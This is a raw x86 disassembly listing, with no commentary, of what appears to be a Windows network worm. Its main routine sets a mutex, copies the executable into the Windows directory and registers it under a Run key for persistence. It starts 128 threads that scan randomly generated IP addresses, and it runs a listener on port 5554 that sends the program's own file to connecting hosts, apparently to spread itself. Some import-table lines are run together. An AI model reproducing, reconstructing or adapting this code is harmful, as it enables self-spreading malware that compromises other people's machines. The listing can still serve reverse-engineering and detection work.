push eax
push off_4068E4
push ebx
call esi ; dword_40511C
lea eax, [ebp+var_60]
push eax
call sub_40129D
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DBE
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_4050EC
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_4050F0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DBE
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4050F8
cmp eax, 0FFFFFFFFh
jnz short loc_401D3F
push ebx
call dword_405100
jmp short loc_401DBE
; ---------------------------------------------------------------------------
loc_401D3F: ; CODE XREF: sub_401B03+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DBE
lea eax, [ebp+var_2]
push offset Source ; Source
push eax ; Dest
call _strcpy
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D89: ; CODE XREF: sub_401B03+2A6�j
call ebx ; dword_40502C
cmp eax, 1
jnz short loc_401DAB
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_40511C
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D89
; ---------------------------------------------------------------------------
loc_401DAB: ; CODE XREF: sub_401B03+28B�j
push [ebp+var_8]
call dword_405020 ; _lclose
lea eax, [ebp+var_60]
push eax
call sub_401A96
pop ecx
loc_401DBE: ; CODE XREF: sub_401B03+1DD�j
; sub_401B03+21B�j ...
push [ebp+var_C]
call dword_405100
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401DDC: ; CODE XREF: sub_401B03+197�j
push [ebp+arg_0]
jmp short loc_401E17
; ---------------------------------------------------------------------------
loc_401DE1: ; CODE XREF: sub_401B03+1B1�j
lea eax, [ebp+Str]
push offset aQuit ; "QUIT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401E01
push ebx
call dword_405100
jmp short loc_401E19
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B03+2F3�j
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E16: ; CODE XREF: sub_401B03+8A�j
; sub_401B03+BB�j
push ebx
loc_401E17: ; CODE XREF: sub_401B03+2DC�j
call esi ; dword_40511C
loc_401E19: ; CODE XREF: sub_401B03+2FC�j
cmp [ebp+var_10], 0
jg loc_401B3E
push [ebp+arg_0]
call dword_405100
pop edi
pop esi
loc_401E2E: ; CODE XREF: sub_401B03+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B03 endp
; =============== S U B R O U T I N E =======================================
sub_401E35 proc near ; CODE XREF: sub_401B03+119�p
; sub_401B03+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E3D: ; CODE XREF: sub_401E35+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E47
cmp al, 9
jnz short loc_401E4A
loc_401E47: ; CODE XREF: sub_401E35+C�j
inc esi
jmp short loc_401E3D
; ---------------------------------------------------------------------------
loc_401E4A: ; CODE XREF: sub_401E35+10�j
; sub_401E35+2E�j
movsx eax, byte ptr [esi]
push eax ; C
call _isalnum
test eax, eax
pop ecx
jz short loc_401E65
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E4A
; ---------------------------------------------------------------------------
loc_401E65: ; CODE XREF: sub_401E35+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E6A proc near ; DATA XREF: WinMain(x,x,x,x)+51�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_4050F0
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E8E
loc_401E86: ; CODE XREF: sub_401E6A+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E8E: ; CODE XREF: sub_401E6A+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_4050EC
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401EC6
push 5
push edi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jnz short loc_401ECF
loc_401EC6: ; CODE XREF: sub_401E6A+4C�j
push edi
call dword_405100
jmp short loc_401E86
; ---------------------------------------------------------------------------
loc_401ECF: ; CODE XREF: sub_401E6A+5A�j
; sub_401E6A+89�j
push esi
push esi
push edi
call dword_4050E4
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B03
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_40501C ; Sleep
jmp short loc_401ECF
sub_401E6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF5 proc near ; DATA XREF: WinMain(x,x,x,x)+65�o
var_54 = byte ptr -54h
var_38 = byte ptr -38h
sub esp, 54h
push ebx
push ebp
mov ebp, dword_4050DC
push esi
push edi
mov esi, 0FFh
loc_401F07: ; CODE XREF: sub_401EF5+F0�j
lea eax, [esp+64h+var_38]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+64h+var_38]
push eax
call dword_40510C
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2D
add edi, 100h
loc_401F2D: ; CODE XREF: sub_401EF5+30�j
test ebx, ebx
jge short loc_401F37
add ebx, 100h
loc_401F37: ; CODE XREF: sub_401EF5+3A�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F94
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F7A
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F91
; ---------------------------------------------------------------------------
loc_401F7A: ; CODE XREF: sub_401EF5+60�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F91: ; CODE XREF: sub_401EF5+83�j
push edi
jmp short loc_401FC0
; ---------------------------------------------------------------------------
loc_401F94: ; CODE XREF: sub_401EF5+50�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FC0: ; CODE XREF: sub_401EF5+9D�j
lea eax, [esp+74h+var_54]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; dword_4050DC
add esp, 18h
lea eax, [esp+64h+var_54]
push eax
call sub_401A12
pop ecx
push 0FAh
call dword_40501C ; Sleep
jmp loc_401F07
sub_401EF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_8 = byte ptr -8
var_4 = byte ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call dword_405044 ; GetTickCount
push eax
call sub_40101E
push 1
call sub_402071
pop ecx
pop ecx
call sub_401028
xor esi, esi
push offset aJobaka3l ; "Jobaka3l"
push esi
push esi
call dword_405040 ; CreateMutexA
call dword_40503C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_40202D
xor eax, eax
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40202D: ; CODE XREF: WinMain(x,x,x,x)+3A�j
push ebx
lea eax, [ebp+var_4]
push edi
mov edi, dword_405038
push eax
push esi
push esi
push offset sub_401E6A
push esi
push esi
call edi ; dword_405038
mov ebx, 80h
loc_402049: ; CODE XREF: WinMain(x,x,x,x)+6F�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF5
push esi
push esi
call edi ; dword_405038
dec ebx
jnz short loc_402049
pop edi
pop ebx
loc_40205D: ; CODE XREF: WinMain(x,x,x,x)+85�j
push esi
call dword_405000
push 0BB8h
call dword_40501C ; Sleep
jmp short loc_40205D
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402071 proc near ; CODE XREF: WinMain(x,x,x,x)+14�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
Dest = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+Dest]
push esi
push eax
call dword_40504C ; GetWindowsDirectoryA
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_4020C9
lea eax, [ebp+Dest]
push offset asc_406AB0 ; "\\"
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_4020C9: ; CODE XREF: sub_402071+43�j
push off_4068C8 ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcat
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_4020F9
lea eax, [ebp+Dest]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_405048 ; CopyFileA
loc_4020F9: ; CODE XREF: sub_402071+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405004
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405008
push [ebp+var_4]
call dword_40500C
leave
retn
sub_402071 endp
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_406D7C
jmp short loc_403430
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404C36 proc near ; CODE XREF: __global_unwind2+13�p
jmp dword_405078
sub_404C36 endp
; ---------------------------------------------------------------------------
dd 0F1h dup(0)
dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_401153+C4�r ...
dword_40501C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40152C+4D0�r ...
dword_405020 dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B03+2AB�r
dword_405024 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405028 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_402071+19�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; WinMain(x,x,x,x)+48�r
dword_40503C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405040 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_40504C dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405050 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405054 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; ___sbh_alloc_new_group+51�r
dword_405058 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; ___sbh_heap_init+D�r ...
dword_40505C dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405060 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_405064 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; _setSBUpLow+14�r
dword_405068 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; ___crtGetStringTypeA+12D�r
dword_40506C dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; ___crtGetStringTypeA+8D�r
dword_405070 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; ___crtGetStringTypeA+11B�r ...
dword_405074 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405078 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_40507C dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; ___sbh_free_block+2C4�r ...
dword_405080 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_405084 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405088 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_40508C dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; __ioinit+166�r
dword_405090 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; __NMSG_WRITE+143�r
dword_405094 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; ___crtLCMapStringA+14D�r ...
dword_405098 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; ___crtLCMapStringA+A7�r
dword_40509C dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_4050A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050A4 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4050A8 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050AC dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050B0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; _doexit+91�r
dword_4050B4 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050B8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; ___crtLCMapStringA+20D�r
dword_4050CC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; ___crtGetEnvironmentStringsA+E1�r
dword_4050D0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050D4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCount dd 0
dword_4050DC dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_4012D8+23�r ...
dd 0
dword_4050E4 dd 0 dword_4050E8 dd 0 ; sub_40152C+2DD�r ...
dword_4050EC dd 0 ; sub_4012D8+118�r ...
dword_4050F0 dd 0 ; sub_4012D8+FC�r ...
dword_4050F4 dd 0 ; sub_4012D8+139�r
dword_4050F8 dd 0 ; sub_4012D8+173�r ...
dword_4050FC dd 0 dword_405100 dd 0 ; sub_4012D8+246�r ...
dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 ; sub_40129D+7�r ...
dword_405110 dd 0 ; sub_40129D+1E�r ...
dword_405114 dd 0 dword_405118 dd 0 dword_40511C dd 0 ; sub_4012D8+1A0�r ...
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 4028A5h, 4028B9h, 746E7572h, 20656D69h dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406D94�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 4
; char asc_4053E8[]
asc_4053E8 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 4
dword_405424 dd 0 ; ___crtLCMapStringA+36�o
dword_405428 dd 0FFFFFFFFh, 4037A5h, 4037A9haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40479Eh, 4047A2h, 0FFFFFFFFh, 404852h, 404856h
; DATA XREF: ___crtLCMapStringA+5�o
dd 55C8h, 2 dup(0)
dd 561Ch, 50DCh, 5500h, 2 dup(0)
dd 570Ah, 5014h, 55D0h, 2 dup(0)
dd 5718h, 50E4h, 54ECh, 2 dup(0)
dd 576Ah, 5000h, 5 dup(0)
dd 5724h, 575Ch, 574Ah, 573Ch, 0
dd 7C801D77h, 7C80BE01h, 7C802442h, 7C834E64h, 7C838AE7h
dd 7C8365A5h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C910331h, 7C80E93Fh, 7C80929Ch, 7C8286EEh, 7C821363h
dd 7C80ADA0h, 7C809A51h, 7C9105D4h, 7C8127A7h, 7C809915h
dd 7C812E76h, 7C80A490h, 7C838A0Ch, 7C809BF8h, 7C810D87h
dd 7C937A40h, 7C91043Dh, 7C809AE4h, 7C812BB6h, 7C810EF8h
dd 7C810E51h, 7C812F39h, 7C80CCA8h, 7C838DE8h, 7C9179FDh
dd 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh
dd 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 7C814AE7h
dd 7C80A0D4h, 7C81CF5Bh, 7C812F08h, 7C80CC97h, 0
dd 7E41A8ADh, 0
dd 80000001h, 80000010h, 80000009h, 80000017h, 80000015h
dd 80000004h, 8000000Dh, 80000003h, 80000039h, 8000000Ch
dd 8000000Bh, 80000034h, 80000073h, 80000002h, 80000013h
dd 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
aSleep db 'Sleep',0
align 10h
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C5F0000h
dd 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aGetlasterror db 'GetLastError',0
align 4
aCreatemutexa db 'CreateMutexA',0
align 4
aGettickcount db 'GetTickCount',0
align 4
aCopyfilea db 'CopyFileA',0
align 4
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
aKernel32_dll db 'KERNEL32.dll',0
align 4
aWs2_32_dll db 'WS2_32.dll',0
align 4
dd 62410000h, 5374726Fh, 65747379h, 7568536Dh, 776F6474h
dd 416Eh, 65520000h, 6F6C4367h, 654B6573h, 79h, 53676552h
dd 61567465h, 4565756Ch, 4178h, 65520000h, 65704F67h, 79654B6Eh
dd 44410041h, 49504156h, 642E3233h, 6C6Ch, 65470000h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 65470000h, 61745374h, 70757472h
